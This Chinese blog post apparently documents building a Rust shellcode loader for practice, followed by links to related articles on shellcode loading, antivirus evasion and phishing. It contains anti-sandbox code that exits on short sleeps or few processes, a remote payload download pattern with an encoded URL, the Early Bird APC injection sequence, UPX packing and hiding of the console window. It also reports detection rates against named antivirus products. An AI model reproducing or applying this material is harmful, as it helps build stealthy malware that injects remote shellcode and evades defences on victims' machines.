学习rust, 练习写一个loader, 不足之处还请指教

编写

隐藏黑框

在注释掉所有打印语句后编译运行还是会弹黑框, 解决方法是头部添加一行(指定 Rust 编译器生成的可执行文件为 Windows 子系统应用程序,而不是控制台应用程序):

#![windows_subsystem = "windows"]

反沙箱

流速检测

pub fn ft() {

    use std::time::{Duration, Instant};

    use std::thread::sleep;

    let start_time = Instant::now();

    sleep(Duration::from_millis(5000));

    let elapsed_time = start_time.elapsed();

    if elapsed_time.as_millis() < 5000 {

        std::process::exit(1);

    }

}

检查进程数

pub fn pc() {

    let mut system = System::new_all();

    system.refresh_all();

    let process_count = system.processes().len();

    if process_count <= 50 {

        std::process::exit(1);

    }

}

网络请求

使用轻量级的HTTP库ureq​, 示例如下:

use ureq;

fn main() {

    let response = ureq::get("https://example.com/file.zip")

        .call()

        .expect("Failed to make request");

    if response.status() == 200 {

        let content = response.into_string().expect("Failed to read response");

        println!("Downloaded file: {}", content);

    } else {

        eprintln!("Failed to download file, status code: {}", response.status());

    }

}

不要直接硬编码url在代码中,然后就用管用伎俩简单编码一下,但是一整个解码使用居然不成, 问gpt说可能产生了不可见字符

拆成protocol,host, port, pattern后解码组合就可以正常读取了, DIE中也没有检出(这个patcher还是要处理一下)

加载shellcode

这里我没有对shellcode进行任何处理, 获取之后直接使用Early Bird​进行注入, 简述一下过程:

  1. 使用 CreateProcessA​ 创建一个进程。
  2. 使用 VirtualAllocEx​ 在目标进程中分配远程内存。
  3. 使用 WriteProcessMemory​ 将 SHELLCODE 复制到已分配的内存中。
  4. 使用 VirtualProtectEx​ 更改内存权限为可执行。
  5. 使用 QueueUserAPC​ 执行进程。
  6. 使用 ResumeThread​ 恢复进程的线程。
  7. 使用 CloseHandle​ 关闭已打开的句柄。

对于错误处理一律退出不使用panic, 可以在代码中细看。

编译优化

为了缩小体积, 在_config.yml​中添加

[profile.release]

# 设置为1个块最大化优化,但时间会更长

codegen-units = 1

# 设置为s时,编译器会优先考虑生成最小的二进制文件大小,同时保持合理的性能

opt-level = "s"

# 链接时优化,可以显著减小二进制文件的大小,并提高性能

lto = true

# 禁止符号表和调试

debug = false

# 剥离调试信息

strip = true

# 崩溃时不希望看到调试信息

panic = "abort"

另外使用压缩库miniz_oxide​,添加上依赖:

[dependencies]

miniz_oxide = "0.5"

最后使用release 通用发布:

cargo build --release

使用cargo-strip​在构建后剥离二进制文件中的调试信息和其他不必要的数据。

cargo install cargo-strip

cargo strip -t target/release/RustLoader.exe

此时大小基本为1.5MB, 也可以继续upx压缩(patcher要注意处理一下), 之后按需加资源

upx -9 --best --force target/release/RustLoader.exe

免杀效果

添加反沙箱后, 无法在虚拟机中测试, 以下测试均使用直接生成的产物(不使用upx, upx-patcher, 反沙箱), 截止测试之时:

微步检出率为1/28

火绒

腾讯电脑管家

360

defender

如果觉得可以欢迎star一起交流~ : 传送门

Rust远程加载shellcode的更多相关文章

  1. 00-DLL劫持&C语言远程加载shellcode

    0x01 杀软拦截检测规则引导-DLL劫持上线 准备工具 cs vs2019 dll劫持工具:https://bbs.pediy.com/thread-224408.htm 极速PDF:https:/ ...

  2. 动态加载 ShellCode绕过杀软

    反病毒解决方案用于检测恶意文件,并且通常使用静态分析技术来区分二进制文件的好坏.如果是恶意文件本身包含恶意内容(ShellCode),那么依靠静态分析技术会非常有效,但如果攻击者使用轻量级的stage ...

  3. 免杀之:Python加载shellcode免杀

    免杀之:Python加载shellcode免杀 目录 免杀之:Python加载shellcode免杀 1 Python 加载Shellcode免杀 使用Python可以做一些加密.混淆,但使用Pyth ...

  4. 在Unity中创建可远程加载的.unity3d包

    在一个Unity项目中,发布包本身不一定要包括所有的Asset(译为资产或组件),其它的部分可以单独发布为.unity3d,再由程序从本地/远程加载执行,这部分不在本文讨论范围.虽然Unity并没有直 ...

  5. Ext2.0之Tabpanel AJAX远程加载多标签页面模式开发技巧

    目前开发的方式是采用远程load页面来实现多页面效果,类似于126邮箱多标签页效果.但是比126邮箱的方式更好,因为页面打开后是load到本地的,126似乎还会重新请求.在近期项目该开发方式已经基本成 ...

  6. CSS远程加载字体

    CSS 远程加载字体的方法,做网站CSS的都知道,用户浏览网站时,网页上的字体是加载本地的.换言之,如果网站使用了用户电脑所没有安装的字体,那显示字体就会被默认字体所代替了,自然效果就大受影响了. 上 ...

  7. bootstrap模态框远程加载网页的正确处理方式

    bootstrap模态框远程加载网页的方法 在bootsrap模态框文档里给出了这个方法: 使用链接模式 <a data-toggle="modal" href=" ...

  8. Bootstrap Modal 使用remote从远程加载内容

        Bootstrap的Modal这个模态窗组件还是很好用的,但在开发的过程中模态窗中的内容大部分都是从后端加载的.要实现模态窗的内容是从后端加载话,常用的实现方式有2种.它们是:     (1) ...

  9. Python内存加载shellcode

    生成 首先生成一个测试的msf shellcode msfvenom -p windows/x64/exec CMD=calc.exe -f python 把其中的shellcode复制出来留待待会使 ...

  10. 钓鱼攻击之远程加载恶意Word模版文件上线CS

    0x00 前言 利用Word文档加载附加模板时的缺陷所发起的恶意请求而达到的攻击目的,所以当目标用户点开攻击者发给他的恶意word文档就可以通过向远程服务器请求恶意模板并执行恶意模板上的恶意代码.这里 ...

随机推荐

  1. OpenCV开发笔记(八十一):通过棋盘格使用鱼眼方式标定相机内参矩阵矫正摄像头图像

    前言   对于广角摄像头通过相机图片可以识别出棋盘角点计算相机内参矩阵,通过畸变校准可以得到较好的效果,但是鱼眼摄像头通过这种方式获得周围四周的图像效果并不是很好.所以,鱼眼摄像头在校准上与普通摄像头 ...

  2. 学习JavaScript第一天

    文章目录 1.JavaScript简介 2.JavaScript编写的位置 2.1.内部JavaScript 2.2外部JavaScript 2.3内联JavaScript 3.JavaScript注 ...

  3. NES 模拟器中音画同步问题

    背景 模拟器是与游戏和播放器都有相似之处的系统.模拟器与游戏的相似之处,在于都需要一个采集输入--执行逻辑--然后按一定帧率(通常是 60 FPS)把画面显示出来的循环.但是模拟器又需要模拟音频设备, ...

  4. springboot 复杂邮件发送

    application.yml配置 密码为邮箱开启smtp时邮箱服务商提供的密码

  5. CSP-S 2024 简单题

    CSP-S 2024 简单题 以下均为考场做法. T1 决斗 (duel) 考虑贪心,按照攻击力 \(a_i\) 排序,从小到大使用所有怪物进行攻击,每只怪物攻击一个在场且能击杀的怪物中,攻击力最大的 ...

  6. 浅析Mongodb注入

    前言 不太会Mongodb的用法,这里学习一下 简单介绍 Mongodb是非关系型数据库(NoSQL),在 MySQL 中,我们所熟知的几个最常见的概念是数据库 (Database).表 (Table ...

  7. BIMFCE选择全量绘制

    var webAppConfig = new Glodon.Bimface.Application.WebApplication3DConfig(); webAppConfig.domElement ...

  8. 拯救php性能的神器webman-使用后台webman-admin

    在webman的插件市场里面发现了这个 webman-admin 安装的话很简单,就是在已经安装了 webman 的目录里面执行  composer require -W webman/admin 安 ...

  9. Model-Agnostic Meta-Learning (MAML) 理解

    模型不可知元学习(Model-Agnostic Meta-Learning, MAML)的目标是使模型每次的梯度更新更有效.提升模型的学习效率.泛化能力等,它可以被看做一种对模型进行预训练的方法,适用 ...

  10. WSL(Ubuntu)连接 Windows 的 USB 设备(完结)

    前言 最近使用 Linux 通过串口与设备通信,之前使用 Linux 都是在 VMware 里创建虚拟机,该平台下若有串口通信需求,有专门的按键功能切换很方便. 但切换了 WSL2 (windows ...